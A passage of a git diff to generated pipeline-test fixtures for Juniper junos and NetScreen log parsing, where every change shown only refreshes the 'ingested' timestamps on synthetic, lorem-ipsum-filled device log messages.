"2021-12-06T12:25:15.834099444Z" + "ingested": "2021-12-10T10:13:45.068334300Z" }, "ecs": { "version": "1.12.0" @@ -675,7 +675,7 @@ { "message": "Apr 8 16:33:58 UI_LOST_CONN message repeated [7847]: loreeuf: Lost connection to daemon orainci", "event": { - "ingested": "2021-12-06T12:25:15.834103371Z" + "ingested": "2021-12-10T10:13:45.068340600Z" }, "ecs": { "version": "1.12.0" @@ -687,7 +687,7 @@ { "message": "Apr 22 23:36:32 PWC_PROCESS_HOLD: restart [1791]: itse: Process lapari holding down child 2702 until signal", "event": { - "ingested": "2021-12-06T12:25:15.834106838Z" + "ingested": "2021-12-10T10:13:45.068349900Z" }, "ecs": { "version": "1.12.0" @@ -699,7 +699,7 @@ { "message": "May 7 06:39:06 undeo ficiade4365.mail.domain: norum.exe[4443]: LIBSERVICED_SOCKET_BIND: : dantium: unable to bind socket ors: failure", "event": { - "ingested": "2021-12-06T12:25:15.834110565Z" + "ingested": "2021-12-10T10:13:45.068359Z" }, "ecs": { "version": "1.12.0" @@ -711,7 +711,7 @@ { "message": "May 21 13:41:41 liq eleumiu2852.lan: mfugiat.exe[3946]: LOGIN_FAILED: : Login failed for user olu from host mSect5899.domain", "event": { - "ingested": "2021-12-06T12:25:15.834114071Z" + "ingested": "2021-12-10T10:13:45.068368Z" }, "ecs": { "version": "1.12.0" @@ -723,7 +723,7 @@ { "message": "Jun 4 20:44:15 idolo.exe[6535]: MIB2D_IFL_IFINDEX_FAILURE: : SNMP index assigned to deseru changed from 6460 to unknown", "event": { - "ingested": "2021-12-06T12:25:15.834117568Z" + "ingested": "2021-12-10T10:13:45.068377Z" }, "ecs": { "version": "1.12.0" @@ -735,7 +735,7 @@ { "message": "Jun 19 03:46:49 modtempo.exe[5276]: CHASSISD_RELEASE_MASTERSHIP: : Release mastership notification", "event": { - "ingested": "2021-12-06T12:25:15.834121225Z" + "ingested": "2021-12-10T10:13:45.068386300Z" }, "ecs": { "version": "1.12.0" @@ -747,7 +747,7 @@ { "message": "Jul 3 10:49:23 fpc4 PWC_PROCESS_HOLD: [3450]: dexea: Process aturExc holding down child 7343 until signal", "event": { - "ingested": "2021-12-06T12:25:15.834124711Z" + "ingested": "2021-12-10T10:13:45.068395300Z" }, "ecs": { "version": "1.12.0" @@ -759,7 +759,7 @@ { "message": "Jul 17 17:51:58 ame.exe[226]: SERVICED_RTSOCK_SEQUENCE : boreet: routing socket sequence error, unknown", "event": { - "ingested": "2021-12-06T12:25:15.834128709Z" + "ingested": "2021-12-10T10:13:45.068406900Z" }, "ecs": { "version": "1.12.0" @@ -771,7 +771,7 @@ { "message": "Aug 1 00:54:32 consect6919.mail.localdomain iset.exe[940]: idpinfo: urere", "event": { - "ingested": "2021-12-06T12:25:15.834132616Z" + "ingested": "2021-12-10T10:13:45.068464200Z" }, "ecs": { "version": "1.12.0" @@ -783,7 +783,7 @@ { "message": "Aug 15 07:57:06 RPD_KRT_NOIFD: restart [4822]: oreeufug: No device 5020 for interface lo4593", "event": { - "ingested": "2021-12-06T12:25:15.834136303Z" + "ingested": "2021-12-10T10:13:45.068473Z" }, "ecs": { "version": "1.12.0" @@ -795,7 +795,7 @@ { "message": "Aug 29 14:59:40 eprehen oinB3432.api.invalid: citatio.exe[5029]: craftd: , unknown", "event": { - "ingested": "2021-12-06T12:25:15.834140231Z" + "ingested": "2021-12-10T10:13:45.068477300Z" }, "ecs": { "version": "1.12.0" @@ -807,7 +807,7 @@ { "message": "Sep 12 22:02:15 ACCT_CU_RTSLIB_error message repeated [7583]: eetd: liquide getting class usage statistics for interface enp0s2674: success", "event": { - "ingested": "2021-12-06T12:25:15.834144008Z" + "ingested": "2021-12-10T10:13:45.068481900Z" }, "ecs": { "version": "1.12.0" @@ -819,7 +819,7 @@ { "message": "Sep 27 05:04:49 userro oree nimadmi7341.www.home RT_FLOW - kmd [", "event": { - "ingested": "2021-12-06T12:25:15.834147815Z" + "ingested": "2021-12-10T10:13:45.068485800Z" }, "ecs": { "version": "1.12.0" @@ -831,7 +831,7 @@ { "message": "Oct 11 12:07:23 LOGIN_PAM_NONLOCAL_USER: restart [686]: rauto: User rese authenticated but has no local login ID", "event": { - "ingested": "2021-12-06T12:25:15.834151722Z" + "ingested": "2021-12-10T10:13:45.068492100Z" }, "ecs": { "version": "1.12.0" @@ -843,7 +843,7 @@ { "message": "Oct 25 19:09:57 doconse.exe[6184]: RPD_KRT_NOIFD : No device 5991 for interface enp0s7694", "event": { - "ingested": "2021-12-06T12:25:15.834155419Z" + "ingested": "2021-12-10T10:13:45.068497900Z" }, "ecs": { "version": "1.12.0" @@ -855,7 +855,7 @@ { "message": "Nov 9 02:12:32 quidolor1064.www.domain: uspinfo: : flow_print_session_summary_output received rcita", "event": { - "ingested": "2021-12-06T12:25:15.834159096Z" + "ingested": "2021-12-10T10:13:45.068505500Z" }, "ecs": { "version": "1.12.0" @@ -867,7 +867,7 @@ { "message": "Nov 23 09:15:06 RPD_TASK_REINIT: restart [1810]: mfugi: Reinitializing", "event": { - "ingested": "2021-12-06T12:25:15.834164206Z" + "ingested": "2021-12-10T10:13:45.068514300Z" }, "ecs": { "version": "1.12.0" @@ -879,7 +879,7 @@ { "message": "Dec 7 16:17:40 inibusBo.exe[2509]: ECCD_TRACE_FILE_OPEN_FAILED : allow: failure", "event": { - "ingested": "2021-12-06T12:25:15.834168173Z" + "ingested": "2021-12-10T10:13:45.068520900Z" }, "ecs": { "version": "1.12.0" @@ -891,7 +891,7 @@ { "message": "Dec 21 23:20:14 ECCD_TRACE_FILE_OPEN_FAILED message repeated [2815]: rudexer: accept: unknown", "event": { - "ingested": "2021-12-06T12:25:15.834172080Z" + "ingested": "2021-12-10T10:13:45.068530400Z" }, "ecs": { "version": "1.12.0" @@ -903,7 +903,7 @@ { "message": "Jan 5 06:22:49 eseosqu oeius641.api.home: laud.exe[913]: LOGIN_FAILED: : Login failed for user turQ from host tod6376.mail.host", "event": { - "ingested": "2021-12-06T12:25:15.834175767Z" + "ingested": "2021-12-10T10:13:45.068536900Z" }, "ecs": { "version": "1.12.0" @@ -915,7 +915,7 @@ { "message": "Jan 19 13:25:23 ine.exe[1578]: FSAD_CONNTIMEDOUT : Connection timed out to the client (oreve2538.www.localdomain, 10.44.24.103) having request type reprehen", "event": { - "ingested": "2021-12-06T12:25:15.834179334Z" + "ingested": "2021-12-10T10:13:45.068543600Z" }, "ecs": { "version": "1.12.0" @@ -927,7 +927,7 @@ { "message": "Feb 2 20:27:57 UI_SCHEMA_SEQUENCE_ERROR: restart [734]: rinre: Schema sequence number mismatch", "event": { - "ingested": "2021-12-06T12:25:15.834182981Z" + "ingested": "2021-12-10T10:13:45.068553100Z" }, "ecs": { "version": "1.12.0" @@ -939,7 +939,7 @@ { "message": "Feb 17 03:30:32 LIBJNX_EXEC_PIPE: restart [946]: olors: Unable to create pipes for command 'deny': unknown", "event": { - "ingested": "2021-12-06T12:25:15.834186658Z" + "ingested": "2021-12-10T10:13:45.068561900Z" }, "ecs": { "version": "1.12.0" @@ -951,7 +951,7 @@ { "message": "Mar 3 10:33:06 UI_DBASE_MISMATCH_EXTENT: restart [4686]: isnost: Database header extent mismatch for file 'lumdolor': expecting 559, got 7339", "event": { - "ingested": "2021-12-06T12:25:15.834190244Z" + "ingested": "2021-12-10T10:13:45.068568400Z" }, "ecs": { "version": "1.12.0" @@ -963,7 +963,7 @@ { "message": "Mar 17 17:35:40 NASD_usage message repeated [7744]: eumfu: unknown: quidex", "event": { - "ingested": "2021-12-06T12:25:15.834193831Z" + "ingested": "2021-12-10T10:13:45.068577700Z" }, "ecs": { "version": "1.12.0" @@ -975,7 +975,7 @@ { "message": "Apr 1 00:38:14 /kmd: ", "event": { - "ingested": "2021-12-06T12:25:15.834197328Z" + "ingested": "2021-12-10T10:13:45.068586800Z" }, "ecs": { "version": "1.12.0" @@ -987,7 +987,7 @@ { "message": "Apr 15 07:40:49 sshd message repeated : very-high: can't get client address: unknown", "event": { - "ingested": "2021-12-06T12:25:15.834201766Z" + "ingested": "2021-12-10T10:13:45.068596200Z" }, "ecs": { "version": "1.12.0" @@ -999,7 +999,7 @@ { "message": "Apr 29 14:43:23 fpc4 RPD_LDP_NBRUP: [4279]: stlaboru: LDP neighbor 10.248.68.242 (eth1282) is success", "event": { - "ingested": "2021-12-06T12:25:15.834205583Z" + "ingested": "2021-12-10T10:13:45.068602300Z" }, "ecs": { "version": "1.12.0" @@ -1011,7 +1011,7 @@ { "message": "May 13 21:45:57 uun iduntutl4723.example: uel.exe[5770]: SNMPD_TRAP_QUEUE_DRAINED: : metco: traps queued to vel sent successfully", "event": { - "ingested": "2021-12-06T12:25:15.834209180Z" + "ingested": "2021-12-10T10:13:45.068608600Z" }, "ecs": { "version": "1.12.0" @@ -1023,7 +1023,7 @@ { "message": "May 28 04:48:31 fpc8 ECCD_PCI_WRITE_FAILED: [4837]: radip: cancel: success", "event": { - "ingested": "2021-12-06T12:25:15.834212777Z" + "ingested": "2021-12-10T10:13:45.068618Z" }, "ecs": { "version": "1.12.0" @@ -1035,7 +1035,7 @@ { "message": "Jun 11 11:51:06 TFTPD_RECVCOMPLETE_INFO message repeated [7501]: piciatis: Received 3501 blocks of 5877 size for file 'tatisetq'", "event": { - "ingested": "2021-12-06T12:25:15.834216293Z" + "ingested": "2021-12-10T10:13:45.068627200Z" }, "ecs": { "version": "1.12.0" @@ -1047,7 +1047,7 @@ { "message": "Jun 25 18:53:40 usp_trace_ipc_reconnect message repeated illum.exe:USP trace client cannot reconnect to server", "event": { - "ingested": "2021-12-06T12:25:15.834219980Z" + "ingested": "2021-12-10T10:13:45.068636500Z" }, "ecs": { "version": "1.12.0" @@ -1059,7 +1059,7 @@ { "message": "Jul 10 01:56:14 amnis atevelit2799.internal.host: tatiset.exe IFP trace\u003e BCHIP: : cannot write ucode mask reg", "event": { - "ingested": "2021-12-06T12:25:15.834224088Z" + "ingested": "2021-12-10T10:13:45.068645700Z" }, "ecs": { "version": "1.12.0" @@ -1071,7 +1071,7 @@ { "message": "Jul 24 08:58:48 RPD_MPLS_LSP_DOWN message repeated [5094]: moditemp: MPLS LSP eth2042 unknown", "event": { - "ingested": "2021-12-06T12:25:15.834228316Z" + "ingested": "2021-12-10T10:13:45.068652300Z" }, "ecs": { "version": "1.12.0" @@ -1083,7 +1083,7 @@ { "message": "Aug 7 16:01:23 CHASSISD_PARSE_INIT: restart [4153]: uatDuisa: Parsing configuration file 'usB'", "event": { - "ingested": "2021-12-06T12:25:15.834232063Z" + "ingested": "2021-12-10T10:13:45.068669Z" }, "ecs": { "version": "1.12.0" @@ -1095,7 +1095,7 @@ { "message": "Aug 21 23:03:57 RMOPD_ROUTING_INSTANCE_NO_INFO: restart [6922]: upidatat: No information for routing instance non: failure", "event": { - "ingested": "2021-12-06T12:25:15.834235569Z" + "ingested": "2021-12-10T10:13:45.068678300Z" }, "ecs": { "version": "1.12.0" @@ -1107,7 +1107,7 @@ { "message": "Sep 5 06:06:31 Utenimad.exe[4305]: CHASSISD_TERM_SIGNAL: : Received SIGTERM request, success", "event": { - "ingested": "2021-12-06T12:25:15.834239206Z" + "ingested": "2021-12-10T10:13:45.068687600Z" }, "ecs": { "version": "1.12.0" @@ -1119,7 +1119,7 @@ { "message": "Sep 19 13:09:05 tseddo.exe[484]: RPD_OSPF_NBRUP : OSPF neighbor 10.49.190.163 (lo50) aUteni due to failure", "event": { - "ingested": "2021-12-06T12:25:15.834242703Z" + "ingested": "2021-12-10T10:13:45.068696600Z" }, "ecs": { "version": "1.12.0" @@ -1131,7 +1131,7 @@ { "message": "Oct 3 20:11:40 cfeb NASD_usage: [6968]: litseddo: failure: metconse", "event": { - "ingested": "2021-12-06T12:25:15.834246250Z" + "ingested": "2021-12-10T10:13:45.068705700Z" }, "ecs": { "version": "1.12.0" @@ -1143,7 +1143,7 @@ { "message": "Oct 18 03:14:14 RPD_LDP_NBRDOWN message repeated [4598]: emu: LDP neighbor 10.101.99.109 (eth4282) is success", "event": { - "ingested": "2021-12-06T12:25:15.834249656Z" + "ingested": "2021-12-10T10:13:45.068714700Z" }, "ecs": { "version": "1.12.0" @@ -1155,7 +1155,7 @@ { "message": "Nov 1 10:16:48 RPD_RDISC_NOMULTI message repeated [4764]: con: Ignoring interface 594 on lo7449 -- unknown", "event": { - "ingested": "2021-12-06T12:25:15.834253213Z" + "ingested": "2021-12-10T10:13:45.068723900Z" }, "ecs": { "version": "1.12.0" @@ -1167,7 +1167,7 @@ { "message": "Nov 15 17:19:22 BOOTPD_NEW_CONF: restart [1768]: isquames: New configuration installed", "event": { - "ingested": "2021-12-06T12:25:15.834257681Z" + "ingested": "2021-12-10T10:13:45.068733Z" }, "ecs": { "version": "1.12.0" @@ -1179,7 +1179,7 @@ { "message": "Nov 30 00:21:57 SNMP_TRAP_LINK_DOWN message repeated [7368]: ngelit: ifIndex 4197, ifAdminStatus ons, ifOperStatus unknown, ifName lo3193", "event": { - "ingested": "2021-12-06T12:25:15.834261438Z" + "ingested": "2021-12-10T10:13:45.068742200Z" }, "ecs": { "version": "1.12.0" @@ -1191,7 +1191,7 @@ { "message": "Dec 14 07:24:31 MIB2D_ATM_ERROR message repeated [4927]: udexerci: voluptat: failure", "event": { - "ingested": "2021-12-06T12:25:15.834265045Z" + "ingested": "2021-12-10T10:13:45.068751500Z" }, "ecs": { "version": "1.12.0" diff --git a/packages/juniper/data_stream/netscreen/_dev/test/pipeline/test-generated.log-expected.json b/packages/juniper/data_stream/netscreen/_dev/test/pipeline/test-generated.log-expected.json index e93685e0b28..6c4b131f83b 100644 --- a/packages/juniper/data_stream/netscreen/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/juniper/data_stream/netscreen/_dev/test/pipeline/test-generated.log-expected.json @@ -3,7 +3,7 @@ { "message": "modtempo: NetScreen device_id=olab system-low-00628(rci): audit log queue Event Alarm Log is overwritten (2016-1-29 06:09:59)", "event": { - "ingested": "2021-12-06T12:25:17.286145875Z" + "ingested": "2021-12-10T10:13:47.070159600Z" }, "ecs": { "version": "1.12.0" @@ -15,7 +15,7 @@ { "message": "luptat: NetScreen device_id=isiutal [moenimi]system-low-00620(gnaali): RTSYNC: Timer to purge the DRP backup routes is stopped. (2016-2-12 13:12:33)", "event": { - "ingested": "2021-12-06T12:25:17.286161895Z" + "ingested": "2021-12-10T10:13:47.070175500Z" }, "ecs": { "version": "1.12.0" @@ -27,7 +27,7 @@ { "message": "deomni: NetScreen device_id=tquovol [ntsuntin]system-medium-00062(tatno): Track IP IP address 10.159.227.210 succeeded. (ofdeF)", "event": { - "ingested": "2021-12-06T12:25:17.286167525Z" + "ingested": "2021-12-10T10:13:47.070184900Z" }, "ecs": { "version": "1.12.0" @@ -39,7 +39,7 @@ { "message": "untutlab: NetScreen device_id=tem [ons]system-medium-00004: DNS lookup time has been changed to start at ationu:ali with an interval of nsect", "event": { - "ingested": "2021-12-06T12:25:17.286171723Z" + "ingested": "2021-12-10T10:13:47.070193900Z" }, "ecs": { "version": "1.12.0" @@ -51,7 +51,7 @@ { "message": "eve: NetScreen device_id=tatiset [eprehen]system-medium-00034(piscing): Ethernet driver ran out of rx bd (port 1044)", "event": { - "ingested": "2021-12-06T12:25:17.286175671Z" + "ingested": "2021-12-10T10:13:47.070202900Z" }, "ecs": { "version": "1.12.0" @@ -63,7 +63,7 @@ { "message": "eomnisis: NetScreen device_id=mqui [civeli]system-high-00026: SCS: SCS has been tasuntex for enp0s5377 .", "event": { - "ingested": "2021-12-06T12:25:17.286179027Z" + "ingested": "2021-12-10T10:13:47.070212Z" }, "ecs": { "version": "1.12.0" @@ -75,7 +75,7 @@ { "message": "rehender: NetScreen device_id=eporroqu [uat]system-high-00026(atquovo): SSH: Maximum number of PKA keys (suntinc) has been bound to user 'xeac' Key not bound. (Key ID nidolo)", "event": { - "ingested": "2021-12-06T12:25:17.286182233Z" + "ingested": "2021-12-10T10:13:47.070221Z" }, "ecs": { "version": "1.12.0" @@ -87,7 +87,7 @@ { "message": "intoccae: NetScreen device_id=ents [pida]system-low-00535(idolor): PKCS #7 data cannot be decapsulated", "event": { - "ingested": "2021-12-06T12:25:17.286185439Z" + "ingested": "2021-12-10T10:13:47.070230600Z" }, "ecs": { "version": "1.12.0" @@ -99,7 +99,7 @@ { "message": "numqu: NetScreen device_id=qui [No Name]system-medium-00520: Active Server Switchover: New requests for equi server will try agnaali from now on. (2016-5-22 14:30:33)", "event": { - "ingested": "2021-12-06T12:25:17.286188785Z" + "ingested": "2021-12-10T10:13:47.070239300Z" }, "ecs": { "version": "1.12.0" @@ -111,7 +111,7 @@ { "message": "ipitla: NetScreen device_id=quae [maccusa]system-high-00072(rQuisau): NSRP: Unit idex of VSD group xerci aqu", "event": { - "ingested": "2021-12-06T12:25:17.286191961Z" + "ingested": "2021-12-10T10:13:47.070245600Z" }, "ecs": { "version": "1.12.0" @@ -123,7 +123,7 @@ { "message": "atu: NetScreen device_id=umexerci [ern]system-low-00084(iadese): RTSYNC: NSRP route synchronization is nsectet", "event": { - "ingested": "2021-12-06T12:25:17.286195207Z" + "ingested": "2021-12-10T10:13:47.070251400Z" }, "ecs": { "version": "1.12.0" @@ -135,7 +135,7 @@ { "message": "dol: NetScreen device_id=leumiu [namali]system-medium-00527(atevel): MAC address 01:00:5e:11:0a:26 has detected an IP conflict and has declined address 10.90.127.74", "event": { - "ingested": "2021-12-06T12:25:17.286198584Z" + "ingested": "2021-12-10T10:13:47.070261300Z" }, "ecs": { "version": "1.12.0" @@ -147,7 +147,7 @@ { "message": "acc: NetScreen device_id=amc [atur]system-low-00050(corp): Track IP enabled (2016-7-18 18:40:50)", "event": { - "ingested": "2021-12-06T12:25:17.286201860Z" + "ingested": "2021-12-10T10:13:47.070265900Z" }, "ecs": { "version": "1.12.0" @@ -159,7 +159,7 @@ { "message": "tper: NetScreen device_id=olor [Neque]system-medium-00524(xerc): SNMP request from an unknown SNMP community public at 10.61.30.190:2509 has been received. (2016-8-2 01:43:25)", "event": { - "ingested": "2021-12-06T12:25:17.286204916Z" + "ingested": "2021-12-10T10:13:47.070272Z" }, "ecs": { "version": "1.12.0" @@ -171,7 +171,7 @@ { "message": "etdol: NetScreen device_id=uela [boN]system-medium-00521: Can't connect to E-mail server 10.210.240.175", "event": { - "ingested": "2021-12-06T12:25:17.286208042Z" + "ingested": "2021-12-10T10:13:47.070281500Z" }, "ecs": { "version": "1.12.0" @@ -183,7 +183,7 @@ { "message": "ati: NetScreen device_id=tlabo [uames]system-medium-00553(mpo): SCAN-MGR: Set maximum content size to offi.", "event": { - "ingested": "2021-12-06T12:25:17.286211137Z" + "ingested": "2021-12-10T10:13:47.070291Z" }, "ecs": { "version": "1.12.0" @@ -195,7 +195,7 @@ { "message": "umwr: NetScreen device_id=oluptate [issus]system-high-00005(uaUteni): SYN flood udantium has been changed to pre", "event": { - "ingested": "2021-12-06T12:25:17.286214424Z" + "ingested": "2021-12-10T10:13:47.070300200Z" }, "ecs": { "version": "1.12.0" @@ -207,7 +207,7 @@ { "message": "tate: NetScreen device_id=imvenia [spi]system-high-00038(etdo): OSPF routing instance in vrouter urerepr is ese", "event": { - "ingested": "2021-12-06T12:25:17.286217740Z" + "ingested": "2021-12-10T10:13:47.070306600Z" }, "ecs": { "version": "1.12.0" @@ -219,7 +219,7 @@ { "message": "smo: NetScreen device_id=etcons [iusmodi]system-medium-00012: ate Service group uiac has epte member idolo from host 10.170.139.87", "event": { - "ingested": "2021-12-06T12:25:17.286221086Z" + "ingested": "2021-12-10T10:13:47.070313Z" }, "ecs": { "version": "1.12.0" @@ -231,7 +231,7 @@ { "message": "ersp: NetScreen device_id=tquov [diconseq]system-high-00551(mod): Rapid Deployment cannot start because gateway has undergone configuration changes. (2016-10-26 19:58:50)", "event": { - "ingested": "2021-12-06T12:25:17.286224613Z" + "ingested": "2021-12-10T10:13:47.070322100Z" }, "ecs": { "version": "1.12.0" @@ -243,7 +243,7 @@ { "message": "mquame: NetScreen device_id=nihilmol [xercita]system-medium-00071(tiumt): The local device reetdolo in the Virtual Security Device group norum changed state", "event": { - "ingested": "2021-12-06T12:25:17.286227809Z" + "ingested": "2021-12-10T10:13:47.070331Z" }, "ecs": { "version": "1.12.0" @@ -255,7 +255,7 @@ { "message": "isnisi: NetScreen device_id=ritatise [uamei]system-medium-00057(quatur): uisa: static multicast route src=10.198.41.214, grp=cusant input ifp = lo2786 output ifp = eth3657 added", "event": { - "ingested": "2021-12-06T12:25:17.286230824Z" + "ingested": "2021-12-10T10:13:47.070340300Z" }, "ecs": { "version": "1.12.0" @@ -267,7 +267,7 @@ { "message": "isis: NetScreen device_id=uasiar [utlab]system-high-00075(loremqu): The local device dantium in the Virtual Security Device group lor velillu", "event": { - "ingested": "2021-12-06T12:25:17.286233910Z" + "ingested": "2021-12-10T10:13:47.070349300Z" }, "ecs": { "version": "1.12.0" @@ -279,7 +279,7 @@ { "message": "bor: NetScreen device_id=rauto [ationev]system-low-00039(mdol): BGP instance name created for vr itation", "event": { - "ingested": "2021-12-06T12:25:17.286237196Z" + "ingested": "2021-12-10T10:13:47.070358700Z" }, "ecs": { "version": "1.12.0" @@ -291,7 +291,7 @@ { "message": "iaeco: NetScreen device_id=equaturv [siu]system-high-00262(veniamqu): Admin user rum has been rejected via the quaea server at 10.11.251.51", "event": { - "ingested": "2021-12-06T12:25:17.286240763Z" + "ingested": "2021-12-10T10:13:47.070367700Z" }, "ecs": { "version": "1.12.0" @@ -303,7 +303,7 @@ { "message": "orroq: NetScreen device_id=vitaedic [orin]system-high-00038(ons): OSPF routing instance in vrouter remagn ecillu", "event": { - "ingested": "2021-12-06T12:25:17.286244209Z" + "ingested": "2021-12-10T10:13:47.070376600Z" }, "ecs": { "version": "1.12.0" @@ -315,7 +315,7 @@ { "message": "enderit: NetScreen device_id=taut [tanimi]system-medium-00515(commodi): emporain Admin User \"ntiumto\" logged in for umetMalo(https) management (port 2206) from 10.80.237.27:2883", "event": { - "ingested": "2021-12-06T12:25:17.286248117Z" + "ingested": "2021-12-10T10:13:47.070385600Z" }, "ecs": { "version": "1.12.0" @@ -327,7 +327,7 @@ { "message": "ori: NetScreen device_id=tconsect [rum]system-high-00073(eporroq): NSRP: Unit ulla of VSD group iqu oin", "event": { - "ingested": "2021-12-06T12:25:17.286252705Z" + "ingested": "2021-12-10T10:13:47.070469600Z" }, "ecs": { "version": "1.12.0" @@ -339,7 +339,7 @@ { "message": "mipsum: NetScreen device_id=lmo [aliquamq]system-medium-00030: X509 certificate for ScreenOS image authentication is invalid", "event": { - "ingested": "2021-12-06T12:25:17.286256382Z" + "ingested": "2021-12-10T10:13:47.070478300Z" }, "ecs": { "version": "1.12.0" @@ -351,7 +351,7 @@ { "message": "orroqu: NetScreen device_id=elitsed [labore]system-medium-00034(erc): PPPoE Settings changed", "event": { - "ingested": "2021-12-06T12:25:17.286259729Z" + "ingested": "2021-12-10T10:13:47.070482800Z" }, "ecs": { "version": "1.12.0" @@ -363,7 +363,7 @@ { "message": "ntNe: NetScreen device_id=itanim [nesciun]system-medium-00612: Switch event: the status of ethernet port mollita changed to link down , duplex full , speed 10 M. (2017-4-2 01:27:07)", "event": { - "ingested": "2021-12-06T12:25:17.286263005Z" + "ingested": "2021-12-10T10:13:47.070487600Z" }, "ecs": { "version": "1.12.0" @@ -375,7 +375,7 @@ { "message": "quide: NetScreen device_id=quaU [undeomni]system-medium-00077(acomm): NSRP: local unit= iutali of VSD group itat stlaboru", "event": { - "ingested": "2021-12-06T12:25:17.286266211Z" + "ingested": "2021-12-10T10:13:47.070491600Z" }, "ecs": { "version": "1.12.0" @@ -387,7 +387,7 @@ { "message": "emq: NetScreen device_id=plicaboN [amc]system-high-00536(acommo): IKE 10.10.77.119: Dropped packet because remote gateway OK is not used in any VPN tunnel configurations", "event": { - "ingested": "2021-12-06T12:25:17.286269637Z" + "ingested": "2021-12-10T10:13:47.070497900Z" }, "ecs": { "version": "1.12.0" @@ -399,7 +399,7 @@ { "message": "scivel: NetScreen device_id=henderi [iusmodt]system-medium-00536(tquas): IKE 10.200.22.41: Received incorrect ID payload: IP address lorinr instead of IP address ercita", "event": { - "ingested": "2021-12-06T12:25:17.286272823Z" + "ingested": "2021-12-10T10:13:47.070505400Z" }, "ecs": { "version": "1.12.0" @@ -411,7 +411,7 @@ { "message": "equu: NetScreen device_id=sintoc [atae]system-medium-00203(tem): mestq lsa flood on interface eth82 has dropped a packet.", "event": { - "ingested": "2021-12-06T12:25:17.286275949Z" + "ingested": "2021-12-10T10:13:47.070513700Z" }, "ecs": { "version": "1.12.0" @@ -423,7 +423,7 @@ { "message": "iqui: NetScreen device_id=tesseci [tat]system-high-00011(cive): The virtual router nse has been made unsharable", "event": { - "ingested": "2021-12-06T12:25:17.286279215Z" + "ingested": "2021-12-10T10:13:47.070522700Z" }, "ecs": { "version": "1.12.0" @@ -435,7 +435,7 @@ { "message": "rroqui: NetScreen device_id=ursin [utemvel]system-medium-00002: ADMIN AUTH: Privilege requested for unknown user atu. Possible HA syncronization problem.", "event": { - "ingested": "2021-12-06T12:25:17.286282231Z" + "ingested": "2021-12-10T10:13:47.070532Z" }, "ecs": { "version": "1.12.0" @@ -447,7 +447,7 @@ { "message": "orumSe: NetScreen device_id=dolor [isiut]system-high-00206(emagn): OSPF instance with router-id emulla received a Hello packet flood from neighbor (IP address 10.219.1.151, router ID mnihilm) on Interface enp0s3375 forcing the interface to drop the packet.", "event": { - "ingested": "2021-12-06T12:25:17.286285497Z" + "ingested": "2021-12-10T10:13:47.070541100Z" }, "ecs": { "version": "1.12.0" @@ -459,7 +459,7 @@ { "message": "eque: NetScreen device_id=eufug [est]system-medium-00075: The local device ntincul in the Virtual Security Device group reet tquo", "event": { - "ingested": "2021-12-06T12:25:17.286288693Z" + "ingested": "2021-12-10T10:13:47.070550Z" }, "ecs": { "version": "1.12.0" @@ -471,7 +471,7 @@ { "message": "imadmini: NetScreen device_id=ide [edq]system-medium-00026(tise): SSH: Attempt to unbind PKA key from admin user 'ntut' (Key ID emullam)", "event": { - "ingested": "2021-12-06T12:25:17.286292009Z" + "ingested": "2021-12-10T10:13:47.070558900Z" }, "ecs": { "version": "1.12.0" @@ -483,7 +483,7 @@ { "message": "ihilmole: NetScreen device_id=saquaea [ons]system-high-00048(quas): Route map entry with sequence number gia in route map binck-ospf in virtual router itatio was porinc (2017-8-22 23:52:50)", "event": { - "ingested": "2021-12-06T12:25:17.286295085Z" + "ingested": "2021-12-10T10:13:47.070567800Z" }, "ecs": { "version": "1.12.0" @@ -495,7 +495,7 @@ { "message": "orum: NetScreen device_id=oinBCSed [orem]system-medium-00050(ilm): Track IP enabled (2017-9-6 06:55:24)", "event": { - "ingested": "2021-12-06T12:25:17.286298181Z" + "ingested": "2021-12-10T10:13:47.070576800Z" }, "ecs": { "version": "1.12.0" @@ -507,7 +507,7 @@ { "message": "ncididun: NetScreen device_id=hen [periamea]system-medium-00555: Vrouter ali PIMSM cannot process non-multicast address 10.158.18.51", "event": { - "ingested": "2021-12-06T12:25:17.286301247Z" + "ingested": "2021-12-10T10:13:47.070585800Z" }, "ecs": { "version": "1.12.0" @@ -519,7 +519,7 @@ { "message": "umwri: NetScreen device_id=odoc [atura]system-high-00030: SYSTEM CPU utilization is high (oreeu \u003e nvo ) iamqui times in tassita minute (2017-10-4 21:00:32)\u003c\u003ccolabori\u003e", "event": { - "ingested": "2021-12-06T12:25:17.286304352Z" + "ingested": "2021-12-10T10:13:47.070593200Z" }, "ecs": { "version": "1.12.0" @@ -531,7 +531,7 @@ { "message": "inc: NetScreen device_id=tect [uiad]system-low-00003: The console debug buffer has been roinBCSe", "event": { - "ingested": "2021-12-06T12:25:17.286307548Z" + "ingested": "2021-12-10T10:13:47.070597400Z" }, "ecs": { "version": "1.12.0" @@ -543,7 +543,7 @@ { "message": "nseq: NetScreen device_id=borumSec [tatemseq]system-medium-00026(dmi): SCS has been tam for eth7686 .", "event": { - "ingested": "2021-12-06T12:25:17.286310754Z" + "ingested": "2021-12-10T10:13:47.070603500Z" }, "ecs": { "version": "1.12.0" @@ -555,7 +555,7 @@ { "message": "uiineavo: NetScreen device_id=sistena [uidexeac]system-high-00620(amquisno): RTSYNC: Event posted to send all the DRP routes to backup device. (2017-11-16 18:08:15)", "event": { - "ingested": "2021-12-06T12:25:17.286314051Z" + "ingested": "2021-12-10T10:13:47.070610300Z" }, "ecs": { "version": "1.12.0" @@ -567,7 +567,7 @@ { "message": "sunt: NetScreen device_id=dquianon [urExc]system-high-00025(iamqui): PKI: The current device quide to save the certificate authority configuration.", "event": { - "ingested": "2021-12-06T12:25:17.286317126Z" + "ingested": "2021-12-10T10:13:47.070617700Z" }, "ecs": { "version": "1.12.0" @@ -579,7 +579,7 @@ { "message": "etdol: NetScreen device_id=Sed [oremeumf]system-high-00076: The local device etur in the Virtual Security Device group fugiatn enima", "event": { - "ingested": "2021-12-06T12:25:17.286320232Z" + "ingested": "2021-12-10T10:13:47.070626800Z" }, "ecs": { "version": "1.12.0" @@ -591,7 +591,7 @@ { "message": "giatquo: NetScreen device_id=lors [its]system-low-00524: SNMP request from an unknown SNMP community public at 10.46.217.155:76 has been received. (2017-12-29 15:15:58)", "event": { - "ingested": "2021-12-06T12:25:17.286323448Z" + "ingested": "2021-12-10T10:13:47.070635900Z" }, "ecs": { "version": "1.12.0" @@ -603,7 +603,7 @@ { "message": "magnaa: NetScreen device_id=sumquiad [No Name]system-high-00628: audit log queue Event Log is overwritten (2018-1-12 22:18:32)", "event": { - "ingested": "2021-12-06T12:25:17.286326594Z" + "ingested": "2021-12-10T10:13:47.070645200Z" }, "ecs": { "version": "1.12.0" @@ -615,7 +615,7 @@ { 